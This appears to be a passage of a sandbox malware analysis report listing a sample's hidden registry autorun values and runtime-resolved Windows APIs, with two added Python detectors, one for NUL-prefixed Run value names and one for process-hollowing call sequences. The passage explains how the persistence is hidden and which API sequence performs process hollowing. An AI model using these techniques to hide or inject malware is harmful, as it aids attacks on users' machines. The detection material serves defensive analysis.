  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xe6\x95\xb2
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xd0\x80
Registry keys read
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
Registry keys written
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xe3\x9c\xb0
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\TabProcGrowth
  • HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xc3\x84
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xe6\x95\xb2
  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\\x0094D355F270963256450765\xd0\x80
Registry keys deleted: none
APIs resolved at runtime (via GetProcAddress / LdrGetProcedureAddress; compare with the sparse static import table above)
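An audit routine for the hidden Run values listed above, as an added example (not code from the report or from Maldun). It works on the value names as the report escapes them and assumes, in unescape, that those escapes are the UTF-8 bytes of the wide registry name. REPORTED_RUN_VALUES holds the four names from this report; CLEAN_RUN_VALUES is a constructed entry for contrast.

```python
"""Audit autorun value names for the hiding trick recorded in this report.
Win32 Reg* APIs and regedit treat a value name as a NUL-terminated string, so
a name that begins with NUL shows up as empty and cannot be addressed by name
through them; the native NtSetValueKey, which this sample resolves at runtime,
takes a counted UNICODE_STRING and writes the full name.  Added example, not
code from the report or from Maldun.  REPORTED_RUN_VALUES are the four names
from the report as escaped there; unescape assumes the escapes are UTF-8 bytes
of the wide name.  CLEAN_RUN_VALUES is constructed."""

_EXE = r"C:\Users\test\AppData\Roaming\94D355F270963256450765\94D355F270963256450765.exe"
REPORTED_RUN_VALUES = {
    r"\x0094D355F270963256450765\xe3\x9c\xb0": _EXE,
    r"\x0094D355F270963256450765\xe6\x95\xb2": _EXE,
    r"\x0094D355F270963256450765\xd0\x80": _EXE,
    r"\x0094D355F270963256450765\xc3\x84": _EXE,
}
CLEAN_RUN_VALUES = {   # constructed, ordinary autorun entry for contrast
    "OneDrive": r"C:\Users\test\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background",
}


def unescape(escaped: str) -> str:
    """Undo the report's \\xNN escaping, then decode the bytes as UTF-8
    (assumed encoding of the wide registry name)."""
    raw = escaped.encode("ascii").decode("unicode_escape").encode("latin-1")
    return raw.decode("utf-8")


def win32_view(name: str) -> str:
    """The name a NUL-terminated-string API (RegEnumValue, regedit) reports."""
    return name.split("\x00", 1)[0]


def ascii_core(name: str) -> str:
    """Printable ASCII characters only; for this sample that is the bot ID."""
    return "".join(c for c in name if 0x20 <= ord(c) <= 0x7e)


def hidden_name_reasons(name: str) -> list[str]:
    """Why this name would be hidden or misread by Win32 tooling; empty if clean."""
    reasons = []
    if name.startswith("\x00"):
        reasons.append("leading_nul")        # Win32 sees an empty name
    elif "\x00" in name:
        reasons.append("embedded_nul")       # Win32 sees a truncated name
    if any(ord(c) < 0x20 and c != "\x00" for c in name):
        reasons.append("control_chars")
    if any(ord(c) > 0x7e for c in name):
        reasons.append("non_ascii")
    return reasons


def audit_run_values(values: dict[str, str]) -> dict[str, dict]:
    """Map each suspicious escaped name to its reasons, the name Win32 would
    show, the printable core and the command the value launches."""
    findings = {}
    for escaped, data in values.items():
        name = unescape(escaped)
        reasons = hidden_name_reasons(name)
        if reasons:
            findings[escaped] = {"reasons": reasons, "win32_view": win32_view(name),
                                 "core": ascii_core(name), "data": data}
    return findings


if __name__ == "__main__":
    for escaped, info in audit_run_values(REPORTED_RUN_VALUES).items():
        print(escaped, info)
    print(audit_run_values(CLEAN_RUN_VALUES))
```

All four reported names are flagged for a leading NUL and a non-ASCII tail, Win32 would show each as an empty name, and the printable core is the bot ID in every case; the constructed OneDrive entry is not flagged. On a live host the same check has to be fed names obtained through the native NtEnumerateValueKey or by parsing the hive file directly, because the Win32 enumeration APIs already truncate at the NUL.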
  • kernel32.dll.FlsAlloc
  • kernel32.dll.FlsFree
  • kernel32.dll.FlsGetValue
  • kernel32.dll.FlsSetValue
  • kernel32.dll.InitializeCriticalSectionEx
  • kernel32.dll.CreateEventExW
  • kernel32.dll.CreateSemaphoreExW
  • kernel32.dll.SetThreadStackGuarantee
  • kernel32.dll.CreateThreadpoolTimer
  • kernel32.dll.SetThreadpoolTimer
  • kernel32.dll.WaitForThreadpoolTimerCallbacks
  • kernel32.dll.CloseThreadpoolTimer
  • kernel32.dll.CreateThreadpoolWait
  • kernel32.dll.SetThreadpoolWait
  • kernel32.dll.CloseThreadpoolWait
  • kernel32.dll.FlushProcessWriteBuffers
  • kernel32.dll.FreeLibraryWhenCallbackReturns
  • kernel32.dll.GetCurrentProcessorNumber
  • kernel32.dll.GetLogicalProcessorInformation
  • kernel32.dll.CreateSymbolicLinkW
  • kernel32.dll.EnumSystemLocalesEx
  • kernel32.dll.CompareStringEx
  • kernel32.dll.GetDateFormatEx
  • kernel32.dll.GetLocaleInfoEx
  • kernel32.dll.GetTimeFormatEx
  • kernel32.dll.GetUserDefaultLocaleName
  • kernel32.dll.IsValidLocaleName
  • kernel32.dll.LCMapStringEx
  • kernel32.dll.GetTickCount64
  • kernel32.dll.LocalAlloc
  • kernel32.dll.VirtualProtect
  • user32.dll.MessageBoxA
  • user32.dll.GetMessageExtraInfo
  • kernel32.dll.WinExec
  • kernel32.dll.CreateFileA
  • kernel32.dll.WriteFile
  • kernel32.dll.CloseHandle
  • kernel32.dll.CreateProcessA
  • kernel32.dll.GetThreadContext
  • kernel32.dll.VirtualAlloc
  • kernel32.dll.VirtualAllocEx
  • kernel32.dll.VirtualFree
  • kernel32.dll.ReadProcessMemory
  • kernel32.dll.WriteProcessMemory
  • kernel32.dll.SetThreadContext
  • kernel32.dll.ResumeThread
  • kernel32.dll.WaitForSingleObject
  • kernel32.dll.GetModuleFileNameA
  • kernel32.dll.GetCommandLineA
  • ntdll.dll.NtUnmapViewOfSection
  • ntdll.dll.NtWriteVirtualMemory
  • user32.dll.RegisterClassExA
  • user32.dll.CreateWindowExA
  • user32.dll.PostMessageA
  • user32.dll.GetMessageA
  • user32.dll.DefWindowProcA
  • kernel32.dll.GetFileAttributesA
  • kernel32.dll.GetStartupInfoA
  • kernel32.dll.VirtualProtectEx
  • kernel32.dll.LoadLibraryA
  • kernel32.dll.GetProcAddress
  • kernel32.dll.GetWindowsDirectoryA
  • kernel32.dll.WideCharToMultiByte
  • user32.dll.wsprintfA
  • kernel32.dll.MultiByteToWideChar
  • msvcrt.dll.malloc
  • msvcrt.dll.free
  • kernel32.dll.CreateRemoteThread
  • shlwapi.dll.PathRemoveFileSpecA
  • shlwapi.dll.PathFindFileNameA
  • msvcrt.dll.strncmp
  • msvcrt.dll._strnicmp
  • kernel32.dll.lstrlenA
  • kernel32.dll.ExitProcess
  • shell32.dll.SHGetFolderPathA
  • kernel32.dll.lstrcpyA
  • kernel32.dll.lstrcatA
  • kernel32.dll.CopyFileA
  • kernel32.dll.GetVolumeInformationA
  • secur32.dll.GetUserNameExA
  • advapi32.dll.LookupAccountNameA
  • advapi32.dll.ConvertSidToStringSidA
  • kernel32.dll.LocalFree
  • msvcrt.dll.memcpy
  • kernel32.dll.lstrcmpA
  • kernel32.dll.lstrcmpiA
  • shlwapi.dll.StrStrA
  • shlwapi.dll.StrStrIA
  • msvcrt.dll.strtol
  • msvcrt.dll.realloc
  • ws2_32.dll.WSAStartup
  • ws2_32.dll.socket
  • ws2_32.dll.gethostbyname
  • ws2_32.dll.htons
  • ws2_32.dll.connect
  • ws2_32.dll.send
  • ws2_32.dll.recv
  • ws2_32.dll.closesocket
  • ws2_32.dll.WSACleanup
  • msvcrt.dll.memset
  • kernel32.dll.Sleep
  • ntdll.dll.NtOpenKey
  • ntdll.dll.NtSetValueKey
  • ntdll.dll.RtlCreateUserThread
  • kernel32.dll.InitializeCriticalSection
  • kernel32.dll.EnterCriticalSection
  • kernel32.dll.LeaveCriticalSection
  • kernel32.dll.GetLastError
  • msvcrt.dll._errno
  • msvcrt.dll.tolower
  • msvcrt.dll.isdigit
  • msvcrt.dll.strtoul
  • msvcrt.dll.isxdigit
  • msvcrt.dll.strtod
  • kernel32.dll.CreateToolhelp32Snapshot
  • kernel32.dll.Process32First
  • kernel32.dll.Process32Next
  • shlwapi.dll.StrChrA
  • shlwapi.dll.StrToIntA
  • kernel32.dll.GetModuleHandleA
  • version.dll.GetFileVersionInfoSizeA
  • version.dll.GetFileVersionInfoA
  • version.dll.VerQueryValueA
  • psapi.dll.GetModuleInformation
  • msvcrt.dll.memcmp
  • kernel32.dll.ExpandEnvironmentStringsA
  • kernel32.dll.GetPrivateProfileSectionNamesA
  • kernel32.dll.GetPrivateProfileStringA
  • kernel32.dll.ReadFile
  • advapi32.dll.RegSetValueExA
  • advapi32.dll.RegOpenKeyExA
  • advapi32.dll.RegCloseKey
  • kernel32.dll.GetFileSize
  • kernel32.dll.IsWow64Process
  • kernel32.dll.GetNativeSystemInfo
  • kernel32.dll.OpenProcess
  • kernel32.dll.CreateThread
  • advapi32.dll.GetUserNameW
  • kernel32.dll.GetComputerNameW
  • kernel32.dll.GetVersionExA
  • kernel32.dll.CreateNamedPipeA
  • kernel32.dll.ConnectNamedPipe
  • kernel32.dll.DisconnectNamedPipe
  • wininet.dll.InternetCrackUrlA
  • kernel32.dll.GetTempPathA
  • kernel32.dll.GetTempFileNameA
  • shell32.dll.ShellExecuteA
  • ws2_32.dll.ioctlsocket
  • ws2_32.dll.ntohs
  • kernel32.dll.CreateMutexA
  • kernel32.dll.ReleaseMutex
  • ntdll.dll.NtCreateThreadEx
  • kernel32.dll.TerminateProcess
  • user32.dll.FindWindowA
  • user32.dll.GetWindowThreadProcessId
  • user32.dll.EnumWindows
  • kernel32.dll.GetCurrentProcessId
  • kernel32.dll.DeleteFileA
  • shlwapi.dll.PathFileExistsA
  • kernel32.dll.CreateDirectoryA
  • wininet.dll.HttpQueryInfoA
  • wininet.dll.HttpQueryInfoW
  • ntdll.dll.RtlCompressBuffer
  • ntdll.dll.RtlGetCompressionWorkSpaceSize
  • user32.dll.SetThreadDesktop
  • user32.dll.CreateDesktopA
  • user32.dll.OpenDesktopA
  • kernel32.dll.TerminateThread
  • user32.dll.SendMessageA
  • user32.dll.ChildWindowFromPoint
  • user32.dll.ScreenToClient
  • user32.dll.MoveWindow
  • user32.dll.GetWindowRect
  • user32.dll.GetMenuItemID
  • user32.dll.MenuItemFromPoint
  • user32.dll.RealGetWindowClassA
  • user32.dll.PtInRect
  • user32.dll.GetWindowPlacement
  • user32.dll.GetWindowLongA
  • user32.dll.SetWindowLongA
  • user32.dll.WindowFromPoint
  • shell32.dll.SHAppBarMessage
  • advapi32.dll.RegQueryValueExA
  • user32.dll.GetDesktopWindow
  • gdi32.dll.DeleteDC
  • user32.dll.ReleaseDC
  • gdi32.dll.DeleteObject
  • gdi32.dll.GetDIBits
  • gdi32.dll.StretchBlt
  • gdi32.dll.SetStretchBltMode
  • gdi32.dll.SelectObject
  • gdi32.dll.CreateCompatibleDC
  • gdi32.dll.CreateCompatibleBitmap
  • user32.dll.GetDC
  • user32.dll.IsWindowVisible
  • user32.dll.GetWindow
  • gdi32.dll.BitBlt
  • user32.dll.PrintWindow
  • user32.dll.GetTopWindow
  • ntdll.dll.NtQueryInformationProcess
  • shell32.dll.SHFileOperationA
  • kernel32.dll.FindFirstFileA
  • kernel32.dll.FindNextFileA
  • sechost.dll.LookupAccountNameLocalA
  • advapi32.dll.EventUnregister
  • kernel32.dll.SortGetHandle
  • kernel32.dll.SortCloseHandle
  • dnsapi.dll.DnsApiFree
  • ntdll.dll.RtlInitAnsiString
  • ntdll.dll.RtlAnsiStringToUnicodeString
  • ntdll.dll.LdrLoadDll
  • ntdll.dll.LdrGetProcedureAddress
  • ntdll.dll.RtlFreeUnicodeString
  • kernel32.dll.VirtualQuery
  • kernel32.dll.InterlockedExchange
  • kernel32.dll.InterlockedCompareExchange
  • kernel32.dll.FlushInstructionCache
  • kernel32.dll.HeapCreate
  • kernel32.dll.HeapDestroy
  • kernel32.dll.HeapAlloc
  • kernel32.dll.HeapReAlloc
  • kernel32.dll.HeapFree
  • kernel32.dll.GetCurrentProcess
  • kernel32.dll.GetCurrentThreadId
  • kernel32.dll.OpenThread
  • kernel32.dll.SuspendThread
  • kernel32.dll.GetModuleHandleW
  • kernel32.dll.Thread32First
  • kernel32.dll.Thread32Next
  • kernel32.dll.GetProcessHeap
  • kernel32.dll.OpenMutexA
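The runtime-resolved list above contains the complete tool-set for process hollowing (CreateProcessA, GetThreadContext, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory / NtWriteVirtualMemory, SetThreadContext, ResumeThread), which matches the "executes a process and injects code into it" signature and the 1.exe-spawns-1.exe step in the process tree. The sandbox does not publish the call order, so the following added example (not code from the report or from Maldun) runs a sequence detector over a constructed trace: the PIDs 1588 and 2064 are taken from the process list, the call order is the textbook hollowing sequence, and the trace line format is invented for the example.

```python
"""Detect a process-hollowing call sequence in an API trace.  Added example,
not code from the report or from Maldun.  TRACE is constructed: PIDs come from
the report's process list, the call order is the textbook sequence, and the
'pid=... api=... key=value' line format is invented here."""
import re
from dataclasses import dataclass, field

CREATE_SUSPENDED = 0x00000004     # dwCreationFlags bit for CreateProcess*
WRITE_ALIASES = {"NtWriteVirtualMemory": "WriteProcessMemory"}
HOLLOW_APIS = {"NtUnmapViewOfSection", "VirtualAllocEx", "WriteProcessMemory",
               "SetThreadContext", "ResumeThread"}
REQUIRED_ORDER = ["WriteProcessMemory", "SetThreadContext", "ResumeThread"]

TRACE = """\
pid=1144 api=CreateProcessA flags=0x0 child=1588
pid=1588 api=CreateProcessA flags=0x4 child=2064
pid=1588 api=GetThreadContext target=2064
pid=1588 api=NtUnmapViewOfSection target=2064
pid=1588 api=VirtualAllocEx target=2064 addr=0x400000 prot=0x40
pid=1588 api=NtWriteVirtualMemory target=2064 addr=0x400000 size=0x3f000
pid=1588 api=SetThreadContext target=2064
pid=1588 api=ResumeThread target=2064
"""


@dataclass
class Call:
    pid: int
    api: str
    args: dict = field(default_factory=dict)


LINE_RE = re.compile(r"pid=(\d+)\s+api=(\w+)\s*(.*)")


def parse_trace(text: str) -> list[Call]:
    """Parse 'pid=N api=Name k=v ...' lines; unparseable lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        pid, api, rest = m.groups()
        args = dict(kv.split("=", 1) for kv in rest.split())
        calls.append(Call(int(pid), api, args))
    return calls


def detect_hollowing(calls: list[Call]) -> list[dict]:
    """For every CreateProcess* with CREATE_SUSPENDED, collect the hollowing
    APIs the creator later aims at that child and report a hit when memory is
    written, the thread context replaced and the thread resumed, in that order.
    NtUnmapViewOfSection is recorded but not required, since some variants
    overwrite the image in place instead of unmapping it."""
    hits = []
    for i, c in enumerate(calls):
        if not c.api.startswith("CreateProcess"):
            continue
        if not int(c.args.get("flags", "0"), 16) & CREATE_SUSPENDED:
            continue
        child = c.args.get("child")
        chain = []
        for later in calls[i + 1:]:
            api = WRITE_ALIASES.get(later.api, later.api)
            if later.pid == c.pid and later.args.get("target") == child and api in HOLLOW_APIS:
                chain.append(api)
        positions = [chain.index(a) if a in chain else -1 for a in REQUIRED_ORDER]
        if min(positions) >= 0 and positions == sorted(positions):
            hits.append({"parent": c.pid, "child": int(child), "chain": chain,
                         "unmapped_original": "NtUnmapViewOfSection" in chain})
    return hits


if __name__ == "__main__":
    for hit in detect_hollowing(parse_trace(TRACE)):
        print(hit)
```

The ordinary CreateProcessA by PID 1144 (no CREATE_SUSPENDED, nothing written into the child) produces no hit; the suspended child 2064 is reported with the full chain and unmapped_original set. A real trace from a hooking sandbox would also carry the handle or thread used for SetThreadContext, which lets the check be tightened to the child's primary thread.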